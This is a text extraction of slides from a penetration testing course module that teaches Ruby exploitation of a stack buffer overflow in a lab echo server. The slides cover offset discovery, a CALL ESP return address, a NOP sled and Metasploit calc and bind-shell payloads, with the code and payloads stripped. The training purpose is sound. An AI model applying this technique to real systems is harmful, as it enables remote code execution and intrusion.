Scribd
Upload
26 views69 pages

9 Exploitation With Ruby

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
26 views69 pages

9 Exploitation With Ruby

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 69

9.

1 ELS Echo Server

9.2 The Exploit

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


At this point of the Ruby course, you should be able to write both
simple and advanced Ruby scripts.

We have seen how to manage files, streams, OS commands,


connections, low level packets, and so on.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


It is time to work with another common penetration testing
activity: exploitation.

Since you already know how to setup a connection (TCP or UDP)


and how to send data to the network, there is nothing else to
learn. If you have studied the system module (buffer overflow in
particular) you have all the prerequisites to perform an
exploitation of service using Ruby.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


However, we will briefly review some buffer overflow concepts and
techniques in order to better understand all of the exploitation
phases.

We will show how to identify a buffer overflow vulnerability of a


crafted server called “ELS Echo Server” and how to use Ruby to
exploit the server.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Penetration Testing Professional 5.0 – Caendra Inc. © 2018
ELS Echo Server is a simple echo server that sends back all the
messages that it receives.

In the following example, it is available at the address 172.16.5.10


and it is bound to port 7707. It runs on a Windows XP SP3
machine.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Let us see how to interact with the server. You can see that ELS
Echo is a very simple service. It sends back the messages that it
receives.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Note that the server responds only to the first message because it
closes the connection after the response.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


You should know that many of the common attacks require some
bad programming, especially for the input data that a service may
receive from the user.

In this case, ELS Echo Server has a common C++ programming bug.
The size of the received data from the user is not checked causing
a buffer overflow possibility.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Let us see what happens when we send a lot of data to the server.
First, we send 100 characters to the service.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


As you can see, we do not obtain any response. We can assume
that the server is crashed.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


This is the code that causes the crash. The vulnerable instruction is
strcpy. You should know from the system module that if the
variable myinput contains more than 20 characters, a buffer
overflow occurs.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


This is how the stack
looks like when the
function input_copy

is called.
local buff_ov_variable
variables
input_copy FRAME
old EBP
Return Address
arguments myinput

caller FRAME …

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The size of buff_ov_variable is 20 bytes; therefore if we put in
more than 20 bytes, we have a buffer overflow and we can
overwrite the Return Address

local buff_ov_variable
variables
input_copy FRAME
old EBP
Return Address
arguments myinput

caller FRAME …

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


From the system security module, you know that the most
common technique to properly overwrite the Return Address is by
using a CALL ESP instruction address (usually located in
Kernel32.dll) and then put the malicious code after the local
variables space.

This holds because ESP stores the top of the stack and when the
RET is executed, the input_copy frame is erased and the top of the
stack contains our malicious code executed next by the CALL ESP.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Therefore to correctly exploit the vulnerability, we have to detect
where to insert the CALL ESP address and the malicious PAYLOAD.

local NOP,NOP,NOP
variables
input_copy FRAME
NOP
CALL ESP address
arguments NOP

caller FRAME Malicious PAYLOAD

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Remember that the previous concepts have been explained in the
system module.

If you are not clear on these concepts, we suggest you go back to


the system module where this topic is explained better and
deeper.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Now we will see how to write a real exploit for the buffer overflow
vulnerability of the ELS Echo Server using Ruby.

Once we know the buffer overflow stack space, using Ruby to send
the exploit will be very easy.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We have seen from the bug detection section that a buffer
overflow vulnerability exists.

But we do not know the correct position of the return address of


the input_copy stack frame. It is required to craft the entire
payload.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Fuzzing is an incremental technique to detect the correct position
of the return address and it is mainly used when we cannot debug
the vulnerable service.

It is a common situation when you work with closed source


software.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


A fuzzer generally sends semi-random attack vectors to an
application in an incremental way. This is used to discover how the
stack looks.

With some appropriate attempts, you can detect the correct


position of the return address.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Obviously penetration testers and hackers use fuzzers only if they
cannot debug the target application by themselves.
If you have the service executable, you can use tools like Immunity
Debugger, IDA Pro or Ollydbg to debug and detect the stack return
address position on your own.

https://www.immunityinc.com/products/debugger/ http://www.ollydbg.de/
https://www.hex-rays.com/products/ida/
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Since we own the source code and the executable of the ELS Echo
service too, we will show how to use Immunity Debugger in
conjunction with some useful tools provided by the Metasploit
framework. We will map the ELS Echo Server stack and detect the
return address position or the function input_copy.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Let us execute the ELS Echo
server with Immunity
Debugger.

Remember that it runs on


Windows XP SP3 (32bit) OS.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Looking at the previous screenshot, you can see that we have set a
breaking point on the RETN instruction of the input_copy function.
This because we want to check the value of the EIP register after
the return.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Remember that in this type of attack, when we overwrite the stack
memory locations, we overwrite the location that stores the
function return address too. Therefore after the RETN value, the
EIP register takes an address overwritten by our buffer overflow
attack.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


For example, let us see what happens when we send a big string of
“A” character. As you can see, the service crashes and EIP stores
“AAAA.”

41 is the HEX value of 'A'.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


To detect where the return address location is (offset from the
vulnerable buffer), we can use two Metasploit tools that you have
already seen in the system module: pattern_create.rb and
pattern_offset.rb available in
• /usr/share/metasploit-framework/tools/

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


First of all, we have to create a pattern with pattern_create.rb; 100
characters is enough.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Then we send the string to the ELS Echo Server using Ruby. This
causes the server to crash and lets us know the correct position of
the return address in the stack.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


As you can see, EIP now contains the value 35624134 which is the
value required by pattern_offset.rb to extract the position of the
return address location in the stack.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The return address location in the stack is at position 44. Attention:
44 is the offset from the first byte of our vulnerable buffer. This
means that our script payload must have 44 character followed by
a CALL ESP (or JMP) instruction address ( i.e.: 0x7C868667 for XP
OS).

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Now we have everything we need to write our exploit. We will see
how to use Ruby and Metasploit to write and send a payload that
executes the calculator on the target vulnerable machine. Then we
will also see how to open a telnet shell on the victim.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Remember that our target is a Windows XP SP3 machine with the
following IP address 172.16.5.10. Moreover the ELS Echo Server is
bound to port 7707.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The preamble is the space between the first byte of the vulnerable
buffer and the return address. We have seen that its length is 44
bytes.

This means that we can insert whatever we want in these bytes


since they are not relevant. Usually is a common convention to
insert NOP operations as preamble ( \x90 is the HEX code for
NOP).

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


In Ruby it is very easy to create a NOP preamble. We can create a
string of 44 '\x90' with this simple line of code:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We have already seen that in Windows XP SP3 we can use
0x7C868667 for a CALL ESP instruction.

Therefore the return address is \x67\x86\x86\x7c: we need to use


Big-Endian.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Before putting the real malicious payload logic, remember that
after the return address, there is space allocated for the arguments
passed to call the function.

It is not important to calculate the exact size of this space. The


important thing is to insert enough NOPs before the real malicious
payload.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Putting enough NOP instructions before our payload makes sure
that when the CALL ESP occurs, it starts executing our malicious
payload from its first instruction (NOPs will be ignored).

ESP points to the top of the stack that contains some NOPs
followed by the malicious payload.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


This is how the stack looks like before RETN.

local NOP,NOP,NOP
variables
input_copy FRAME
NOP
CALL ESP address
arguments NOP,NOP,NOP

NOP,NOP,NOP
caller FRAME
Malicious payload

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The next instruction executed is CALL ESP that start to execute the
first NOP instruction until it reaches the malicious payload.

EIP register CALL ESP address

ESP points here


NOP,NOP,NOP
caller FRAME
Malicious payload

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


For our purpose, 10 NOPs are enough.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Now its time to generate the real malicious payload. Metasploit
helps us with two tools: msfpayload and msfencode.

We have already seen them; the former can be used to generate


the malicious payload while the latter can be used to encode the
payload in order to avoid bad characters.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Our purpose is to create a payload that executes the calculator.

This means that after the exploitation, calc.exe will be


automatically executed on the server machine.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Since the vulnerability is caused by a strcpy in a C++ application,
we must avoid the '\x00' character (end of line); this is because
strcpy will stop the copy if it encounters these bytes.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The generated malicious payload is the last part of our entire
payload.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Therefore the entire payload is the concatenation of all the parts
generated in the previous step.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


It is time to test if our exploit works.

Obviously we can use a simple Ruby TCP connection to send the


payload we created in the previous step.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


This is the full code of our exploit. As you can see, it is very simple.

Note that the payload


has been stripped.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Now it is time to exploit ELS Echo Server. The exploitation script is
called echoS_calcExpl.rb and takes two arguments: the target host
and port.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


On the server machine, a
calculator has been
executed. The exploit
works.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The previous exploitation has the purpose of showing you that the
buffer overflow vulnerability can be easily exploited.

In real scenarios, the penetration tester wants to do more


interesting things on the victim machine so he can discover other
misconfigurations and vulnerabilities.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


You have already seen that with Metasploit, you can create some
useful payloads. The most commonly used are shell payloads and
meterpreter payloads (with a bind or a reverse connection).

Now we will modify the previous exploitation script in order to use


the vulnerability to open a telnet service on the victim.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Remember that the victim machine has 172.16.5.10 address and
the vulnerable service ELS Echo Server is bound to the port 7707.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


To create the payload, we can use msfpayload and msfencode (to
avoid the \x00 on the resulting string).

We want an access to the command line interface of the victim


machine, therefore we can use the payload
windows/shell_bind_tcp.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Before creating the payload, let us see which options we can set
for this payload.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


We want the shell to be available at port 1117; therefore we have
to create the payload with the following commands.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


The script is easy; we can use the skeleton for the calculator
exploitation script and replace the calc malicious payload with the
string generated by msfpayload/msfencode.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Here it is. We have updated the final payload.

Note that the payload


has been stripped.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Now we have a new script (called echoS_shellExpl.rb) that exploits
the victim ELS Echo Server.

Let us run it and see if it works.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Remember that the payload specifies that the shell is bound to the
port 1117. Therefore after the exploit execution we should use
telnet to connect to the victim machine. Here we can see that the
connection works!

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Exploitation with Ruby

The remote machine (172.16.5.10) in


the target network has a vulnerable
service named eLS Echo Service. Your
goal is to find the vulnerability and
write a Ruby script that exploits it.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Immunity Debugger IDA Pro
https://www.immunityinc.com/products/deb
https://www.hex-rays.com/products/ida/
ugger/

Ollydbg
http://www.ollydbg.de/

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Exploitation with Ruby

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


Exploitation With Ruby
Your goal is to find the
vulnerability and write a Ruby
script that exploits it

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

You might also like